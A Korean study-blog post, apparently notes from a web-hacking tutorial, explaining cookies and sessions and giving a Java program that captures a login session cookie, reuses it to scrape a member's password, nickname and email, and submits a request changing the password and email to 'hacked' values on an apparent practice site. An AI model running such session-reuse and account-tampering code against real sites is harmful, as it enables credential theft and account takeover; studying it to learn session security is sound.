[WEB HACKING] cookie와 session

출처 : https://www.youtube.com/playlist?list=PLRx0vPvlEmdDQxb41uc1G4ecjV-hklFDM

https://www.wireshark.org/ : 자신이 어떠한 패킷을 받고 보내는 지 알 수 있음

HTTP POST와 GET

post : 쉽게 보이지 않음

get : 쉽게 보임 (naver 검색 시 자신이 검색한 내용이 인코딩 되어서 검색창에 나타남)

cookie

-웹에 client가 접속시 cookie를 client가 가지고 있음

 이후에 다시 접속할 때 cookie를 보고 사용자의 정보를 가져올 수 있음

-보안에 좋지 않음

session :로그인 시 로그인된 아이디를 가지고 있어서 어떤 사용자인지 알 수 있음

=> Session을 복제해서 자신이 session을 가진 사용자 인 것처럼 속일 수 있음

import java.io.BufferedReader; import java.io.InputStreamReader; import java.net.HttpURLConnection; import java.net.URL; public class Main { public static void main(String[] args) throws Exception { String memberID = "test"; String memberPassword = "test"; String target = "http://www.dowellcomputer.com/member/memberLoginAction.jsp?memberID=" + memberID + "&memberPassword=" + memberPassword; HttpURLConnection con = (HttpURLConnection) new URL(target).openConnection(); String cookie = ""; // client에서 저장하는 정보 (웹에 접속하면 웹에서 정보를 보내서 cookie에 저장) // 웹에서 다시 접속하면 cookie에 저장된 정보를 가져와 이용자의 정보를 확인함 String temp = con.getHeaderField("Set-Cookie"); //쿠키 가져옴 if (temp != null) { cookie = temp; } System.out.println("현재 당신의 세션은 : " + temp); con = (HttpURLConnection) new URL( "http://www.dowellcomputer.com/hacking/member/memberUpdateForm.jsp?memberID=" + memberID) .openConnection(); con.setRequestProperty("Cookie", cookie); // 방금 자신이 얻은 자신의 쿠키값을 보냄 // 정상적인 접속으로 받아들임 // html파일을 그대로 출력하기 위하여 BufferedReader br = new BufferedReader(new InputStreamReader(con.getInputStream(), "UTF-8")); while ((temp = br.readLine()) != null) { if (temp.contains("value=\"") && temp.contains("memberPassword")) { System.out.println("해당 사용자의 PW : " + temp.split("value=\"")[1].split("\">")[0]); } if (temp.contains("value=\"") && temp.contains("memberNickname")) { System.out.println("해당 사용자의 nickname : " + temp.split("value=\"")[1].split("\">")[0]); } if (temp.contains("value=\"") && temp.contains("memberEmail")) { System.out.println("해당 사용자의 Email : " + temp.split("value=\"")[1].split("\">")[0]); } System.out.println(temp); } con = (HttpURLConnection) new URL("http://www.dowellcomputer.com/hacking/member/memberUpdateAction.jsp?ID=" + memberID + "&memberPasswrod=hacked&memberNickname=test&memberEmail=hacked@naver.com") .openConnection(); con.setRequestProperty("Cookie", cookie); br = new BufferedReader(new InputStreamReader(con.getInputStream(), "UTF-8")); while ((temp = br.readLine()) != null) { System.out.println(temp); } con.disconnect(); br.close(); // buffer도 닫아줌 // 연결이 된다면 비밀번호 값과 ID값을 코드 상에서 볼 수 있음 } }

현재는 로그인이 되지 않지만 전체적인 흐름을 보기 위해서 코드를 작성한다.

회원가입하면 될것 같지만 너무 귀찮다..

현재 코드를 보면 String temp에 Set-Cookie를 넣음으로써 cookie를 저장한다

그리고 가져온 session을 이용하여 회원정보를 수정하거나, 해당 사이트에 로그인 해야 볼 수 있는 기능들을 볼 수 있다.